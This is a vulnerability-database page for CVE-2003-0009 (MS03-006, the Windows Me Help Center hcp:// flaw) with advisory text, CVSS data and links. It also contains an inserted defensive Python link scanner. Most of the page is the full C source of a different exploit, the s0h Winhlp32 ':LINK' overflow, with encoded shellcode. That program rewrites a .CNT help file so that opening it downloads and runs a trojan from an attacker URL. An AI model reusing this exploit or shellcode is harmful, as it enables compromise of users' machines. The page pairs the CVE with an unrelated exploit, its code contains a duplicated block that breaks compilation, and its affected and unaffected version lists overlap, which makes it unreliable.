CVE-2003-0009
CVSS6.8
Published: 2003-03-07 00:00:00
Revised: 2016-10-17 22:28:15

[Original text] Cross-site scripting (XSS) vulnerability in Help and Support Center for Microsoft Windows Me allows remote attackers to execute arbitrary script in the Local Computer security context via an hcp:// URL with the malicious script in the topic parameter.


[CNNVD] Microsoft Windows Help and Support Center Buffer Overflow Vulnerability (MS03-006) (CNNVD-200303-044)

        
        Help and Support Center provides users with centralized services and help, such as product documentation, hardware compatibility diagnosis, access to Windows Update, and Microsoft online help. Users and programs can open Help and Support Center by invoking a URI link with the "hcp://" prefix.
        The Windows ME version of Help and Support Center lacks proper bounds checking in its "hcp://" URL handler, and a remote attacker can exploit this flaw to potentially execute arbitrary instructions on the system with the privileges of the user's process.
        An attacker can exploit this vulnerability by constructing a malicious URL; when the user clicks it, arbitrary code can be executed in the Local Computer security context. The URL can be embedded in a web page or sent directly to the user by e-mail, and when the user clicks the URL the attacker gains the ability to read or launch files on the local system. In the e-mail case, if the user runs Outlook Express 6.0 or Outlook 2002 with their default configuration, or Outlook 98 or 2000 with the Outlook Email Security Update ( http://office.microsoft.com/Downloads/2000/Out2ksec.aspx ) applied, the attacker cannot make the code run automatically when the user reads the mail; the user has to click the URL. Otherwise the attacker can have the malicious code run automatically without the user clicking the URL.
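As an added defender-side example (not code from the page, Microsoft, or any of the cited sources): a Python scanner of the kind a mail or web gateway would run, which flags hcp:// links and in particular those whose topic parameter carries script markup, the pattern described in the record above. The sample HTML and the hcp:// paths are constructed placeholders, not real Help Center topics.

```python
# Added example (not from the page or any vendor): flag hcp:// links whose
# "topic" parameter carries script markup (the CVE-2003-0009 pattern).
# All sample URLs/HTML below are constructed; hcp:// paths are placeholders.
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import urlsplit, parse_qs, unquote

SCRIPT_MARKERS = ("<script", "javascript:", "vbscript:", "onerror=", "onload=")

def _fully_unquote(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding (%253C -> %3C -> <)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_hcp_url(url: str) -> Optional[str]:
    """'script-in-topic' or 'hcp-link' for an hcp:// URL; None for other schemes."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() != "hcp":
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("topic", []):
        low = _fully_unquote(raw).lower()
        if any(marker in low for marker in SCRIPT_MARKERS):
            return "script-in-topic"
    return "hcp-link"   # any hcp:// link in mail or web content is worth logging

class _LinkCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.urls = []
    def handle_starttag(self, tag, attrs):
        # collect every href/src attribute value, whatever the tag
        self.urls += [v for k, v in attrs if k in ("href", "src") and v]

def scan_html(html: str) -> dict:
    """Map each hcp:// URL found in the HTML to its verdict."""
    collector = _LinkCollector()
    collector.feed(html)
    return {u: v for u in collector.urls if (v := classify_hcp_url(u))}

# Constructed sample: a harmless link, a plain hcp:// link, and an hcp:// link
# with a double-encoded script tag in its topic parameter.
SAMPLE_HTML = """<p>See <a href="http://example.test/page.htm">our site</a> or the
<a href="hcp://system/example.htm?topic=intro">help topic</a>.</p>
<a href="hcp://system/example.htm?topic=%253Cscript%253Ealert(1)%253C/script%253E">click</a>"""

if __name__ == "__main__":
    for url, verdict in scan_html(SAMPLE_HTML).items():
        print(verdict, url)
```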
        

- CVSS (base score)

CVSS score: 6.8 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Access complexity: [--]
Access vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_xp::gold:professional    Microsoft Windows XP Professional Gold
cpe:/o:microsoft:windows_me    Microsoft Windows ME
cpe:/o:microsoft:windows_xp:::home

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0009
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0009
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-044
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=104636383018686&w=2
(UNKNOWN)  BUGTRAQ  20030227 MS-Windows ME IE/Outlook/HelpCenter critical vulnerability
http://www.ciac.org/ciac/bulletins/n-047.shtml
(UNKNOWN)  CIAC  N-047
http://www.iss.net/security_center/static/11425.php
(VENDOR_ADVISORY)  XF  winme-hsc-hcp-bo(11425)
http://www.kb.cert.org/vuls/id/489721
(UNKNOWN)  CERT-VN  VU#489721
http://www.microsoft.com/technet/security/bulletin/ms03-006.asp
(VENDOR_ADVISORY)  MS  MS03-006
http://www.securityfocus.com/bid/6966
(VENDOR_ADVISORY)  BID  6966

- Vulnerability information

Microsoft Windows Help and Support Center Buffer Overflow Vulnerability (MS03-006)
Medium  Boundary condition error
2003-03-07 00:00:00 2005-05-13 00:00:00
Remote
        
        

- Advisories and patches

        Vendor patch:
        Microsoft
        ---------
        Microsoft has released a security bulletin (MS03-006) and a corresponding patch:
        MS03-006: Flaw in Windows Me Help and Support Center Could Enable Code Execution (812709)
        Link:
        http://www.microsoft.com/technet/security/bulletin/MS03-006.asp

        Via Windows Update:
        * Microsoft Windows Me:
        
        http://windowsupdate.microsoft.com

- Vulnerability information (22289)

Microsoft Windows XP/ME Help and Support Center Buffer Overflow Vulnerability (EDBID:22289)
windows remote
2003-02-26 Verified
0 s0h
N/A
source: http://www.securityfocus.com/bid/6966/info

The Microsoft Windows ME Help and Support Center is prone to a buffer overflow. This is due to insufficient bounds checking on input supplied through the HCP URI parameter.

An attacker can exploit this vulnerability by making an HCP request with an overly long string. This will trigger the overflow condition and may result in malicious attacker-supplied code being executed on the vulnerable system.

A similar vulnerability was reported in the Windows XP Help and Support Center (BID 6802). These vulnerabilities may be related.

** Conflicting details have been reported about this vulnerability. The discoverer claims that the issue is cross-site scripting that allows script code embedded in the HCP URL to be executed. The discoverer also claims that Windows XP without SP1 is also vulnerable to this issue, while Microsoft claims that it is not.

/*************************************************
 * s0h - Skin Of Humanity.
 * http://s0h.cc
 *
 * Title : Win32hlp exploit for : ":LINK overflow"
 * Date : Sunday, 9 March, 2003 1:00 AM 
 *
 * -----------------------------------------------
 *  
 * Archive : http://s0h.cc/exploit/s0h_Win32hlp.c
 * Binary : http://s0h.cc/exploit/s0h_Win32hlp.exe
 * 
 * -----------------------------------------------
 * Discovered by ThreaT <threat@s0h.cc>.
 * Coded by ThreaT <threat@s0h.cc>
 * Homepage : http://s0h.cc/~threat/
 * 
 * Winhlp32.exe exploit for ':LINK' overflow !
 * 
 * -----------------------------------------------
 *
 * This exploit can trap a .CNT file (the file that
 * accompanies a .HLP file) with arbitrary code that
 * downloads and executes a trojan without asking the
 * user.
 *
 * -----------------------------------------------
 * 
 * Compiling : cl /nologo s0h_Win32hlp.c
 * Usage : s0h_Win32hlp.exe <trojan> <CNT file> [offset]
 * Eq : C:\>s0h_Win32hlp.exe http://www.chez.com/mvm/trojan.exe c:\WINNT\Help\mplayer2.cnt 4
 * 
 * <trojan> = URL to download the trojan from
 * (http://blah.plof/trojan.exe).
 * 
 * <CNT file> = The CNT file.
 * 
 * [offset] = Optional. A number between 0 and 15 that
 * adjusts the return address. Generally, use 4 if the
 * .HLP file is opened by an application.
 * 
 * -----------------------------------------------
 * This exploit was tested on :
 * 	- Windows 2000 PRO/SERVER (fr) SP0
 * 	- Windows 2000 PRO/SERVER (fr) SP1
 *	- Windows 2000 PRO/SERVER (fr) SP2
 *
 ************************************************/


#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define taille	270	/* "taille" (French: size) = length of RealGenericShellcode below */
#define VulnLen	650	/* total length of the oversized ":Link" line written to the CNT file */

int main (int argc, char *argv[]) {

	HANDLE ExploitFile;
	DWORD lpNumberOfBytesWritten, lpFileSizeHigh, FileSize;

	int i,j, len, RetByte=0xE5;	/* RetByte: second byte of the return address */

	char *file, *url;

unsigned char *Shellcode, *buffer,

RealGenericShellcode[] = 
"\x68\x5E\x56\xC3\x90\x8B\xCC\xFF\xD1\x83\xC6\x0E\x90\x8B\xFE\xAC"
"\x34\x99\xAA\x84\xC0\x75\xF8"

"\x72\xeb\xf3\xa9\xc2\xfd\x12\x9a\x12\xd9\x95\x12\xd1\x95\x12\x58\x12\xc5\xbd\x91"
"\x12\xe9\xa9\x9a\xed\xbd\x9d\xa1\x87\xec\xd5\x12\xd9\x81\x12\xc1\xa5\x9a\x41\x12"
"\xc2\xe1\x9a\x41\x12\xea\x85\x9a\x69\xcf\x12\xea\xbd\x9a\x69\xcf\x12\xca\xb9\x9a"
"\x49\x12\xc2\x81\xd2\x12\xad\x03\x9a\x69\x9a\xed\xbd\x8d\x12\xaf\xa2\xed\xbd\x81"
"\xed\x93\xd2\xba\x42\xec\x73\xc1\xc1\xaa\x59\x5a\xc6\xaa\x50\xff\x12\x95\xc6\xc6"
"\x12\xa5\x16\x14\x9d\x9e\x5a\x12\x81\x12\x5a\xa2\x58\xec\x04\x5a\x72\xe5\xaa\x42"
"\xf1\xe0\xdc\xe1\xd8\xf3\x93\xf3\xd2\xca\x71\xe2\x66\x66\x66\xaa\x50\xc8\xf1\xec"
"\xeb\xf5\xf4\xff\x5e\xdd\xbd\x9d\xf6\xf7\x12\x75\xc8\xc8\xcc\x66\x49\xf1\xf0\xf5"
"\xfc\xd8\xf3\x97\xf3\xeb\xf3\x9b\x71\xcc\x66\x66\x66\xaa\x42\xca\xf1\xf8\xb7\xfc"
"\xe1\x5f\xdd\xbd\x9d\xfc\x12\x55\xca\xca\xc8\x66\xec\x81\xca\x66\x49\xaa\x42\xf1"
"\xf0\xf7\xdc\xe1\xf3\x98\xf3\xd2\xca\x71\xb5\x66\x66\x66\x14\xd5\xbd\x89\xf3\x98"
"\xc8\x66\x49\xaa\x42\xf1\xe1\xf0\xed\xc9\xf3\x98\xf3\xd2\xca\x71\x8b\x66\x66\x66"
"\x66\x49\x71\xe6\x66\x66\x66";


printf (" * ***************************************************** *\n"
	" *                 s0h - Skin of humanity                *\n"
	" *                    http://s0h.cc/                     *\n"
	" * ***************************************************** *\n"
	"     Win32hlp exploit for : \":LINK overflow\"           *\n"
	" * ***************************************************** *\n"
	" * Discovered by ThreaT <threat@s0h.cc>.                 *\n"
	" * Coded by ThreaT <threat@s0h.cc>                       *\n"
	" * Homepage : http://s0h.cc/~threat/                     *\n" 
	" * Archive : http://s0h.cc/exploit/s0h_Win32hlp.c        *\n"
	" * ***************************************************** *\n"
	);

if (argc < 3)
{
	printf(
		" * ***************************************************** *\n"
		" * Usage : s0h_Win32hlp.exe <trojan> <CNT file> [offset] *\n"
		" *                                                       *\n"
		" * <trojan> = URL to download the trojan from            *\n"
		" * (http://blah.plof/trojan.exe).                        *\n"
		" *                                                       *\n"
		" * <CNT file> = The CNT file.                            *\n"
		" *                                                       *\n"
		" * [offset] = Optional. A number between 0 and 15 that   *\n"
		" * adjusts the return address. Generally use 4 if the    *\n"
		" * .HLP file is opened by an application.                *\n"
		" * ***************************************************** *\n"	
	);

	ExitProcess (1);
}

	ExitProcess (1);
}

/* optional offset (0-15) tweaks the second byte of the return address */
if (argv[3]) RetByte = atoi (argv[3]) + 0xE0;

/* decoder stub + encoded URL + delimiter + terminator byte + 4-byte return address */
len = taille + strlen (argv[1]) + 2 + 4;
url = (char *) malloc (strlen (argv[1]) + 1);	/* +1 for the terminating NUL */
strcpy (url, argv[1]);

/*
* Create the final shellcode
*/

Shellcode = (unsigned char *) malloc (len);

// XOR-encode the URL in place (the decoder stub at the start of
// RealGenericShellcode undoes this at run time); 'url' keeps the
// clear-text copy for the final status message
for (i=0;i<strlen (argv[1]); argv[1][i++]^=0x99);

// copy the decoder stub + payload into the shellcode buffer
for (i=0;i<taille; i++) Shellcode[i]=RealGenericShellcode[i];

// append the encoded URL right after it ('i' continues from taille)
for (j=0; j<strlen (url); j++) Shellcode[i++]=argv[1][j];


Shellcode[len-6]=0x99; // URL delimitation
Shellcode[len-5]=0x2E; // fuck the winhlp32.exe parser

// append the RET ADDR
// Play with this bytes if the xploit don't work
Shellcode[len-4]=0x30;
Shellcode[len-3]=RetByte;
Shellcode[len-2]=0x06;
Shellcode[len-1]=0x00;


/*  Now build the oversized ":Link" line: a NOP sled, with the shellcode in the last 'len' bytes */

buffer = (unsigned char *) malloc (VulnLen);
memset (buffer,0,VulnLen);

lstrcpy ((char *)buffer,":Link ");
for (i=6; i < VulnLen - len; i++) buffer[i] = 0x90;		/* NOP sled */
for (j=0; i < VulnLen; i++, j++) buffer[i] = Shellcode[j];	/* 'i' continues where the sled ended */


/* Trap the CNT file specified with the vuln string */

ExploitFile = CreateFile (argv[2],GENERIC_READ+GENERIC_WRITE,
			  FILE_SHARE_READ+FILE_SHARE_WRITE,NULL,
			  OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);

if ( ExploitFile == INVALID_HANDLE_VALUE) {
	printf ("Error : cannot open cnt file '%s'\n",argv[2]);
	ExitProcess (1);
}

	FileSize = GetFileSize(ExploitFile, &lpFileSizeHigh);
	/* a .CNT file is far below 4 GB, so the high DWORD (lpFileSizeHigh) is always 0 here */

	/* read the original CNT content, preceded by a CRLF so it starts on a fresh line */
	file = (char *)LocalAlloc (LPTR, FileSize + 2);
	file[0] = 0x0d;
	file[1] = 0x0a;
	file += 2;

	ReadFile(ExploitFile,file,FileSize,&lpNumberOfBytesWritten,NULL);
	
	/* rewrite the file: the crafted :Link line first, the original content after it */
	SetFilePointer (ExploitFile,0,NULL,FILE_BEGIN);
	WriteFile (ExploitFile,buffer,VulnLen,&lpNumberOfBytesWritten,NULL);
	
	file -= 2;
	WriteFile (ExploitFile,file,FileSize+2,&lpNumberOfBytesWritten,NULL);
	
	CloseHandle(ExploitFile);
	
        printf (
		" * *******************************************************\n"
		" * The file is now trapped and ready to download and     *\n"
		" * execute :                                             *\n"
		" * File : %s\n"
		" * At : %s\n"
		" * *******************************************************\n"
		,argv[2],url);
		
		if (RetByte != 0xE5)
			printf (
				" * *******************************************************\n"
				" * You have specified this address : 0x0006%x30          *\n"
				" * The arbitrary code will be loaded via an application. *\n"
				" * *******************************************************\n"
				,RetByte);
			

	return 0;
}


		

- Vulnerability information

6074
Microsoft Windows Me HSC hcp:// URL XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Unknown

- Vulnerability description

Windows Me contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate hcp:// URLs. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- Timeline

2003-02-26 2003-02-26
2003-02-26 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- References

- Vulnerability author

- Vulnerability information

Microsoft Windows Help and Support Center Buffer Overflow Vulnerability
Boundary Condition Error 6966
Yes No
2003-02-26 12:00:00 2009-07-11 08:06:00
Discovery of this vulnerability credited to Warning and Fozzy.

- Affected versions

Microsoft Windows XP Professional
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition
Microsoft Windows ME
Microsoft Windows XP Professional SP1
Microsoft Windows XP Home SP1
Microsoft Windows XP 64-bit Edition SP1

- Unaffected versions

Microsoft Windows XP Professional SP1
Microsoft Windows XP Home SP1
Microsoft Windows XP 64-bit Edition SP1

- Exploit

An exploit exists for this vulnerability.

- Solution

Users are advised to obtain patches via Windows Update.

This issue was reportedly repaired for Windows XP as part of the fix provided in MS02-060 (also included in Windows XP Service Pack 1).


Microsoft Windows XP Home

Microsoft Windows XP Professional

Microsoft Windows XP 64-bit Edition

- References

 

 
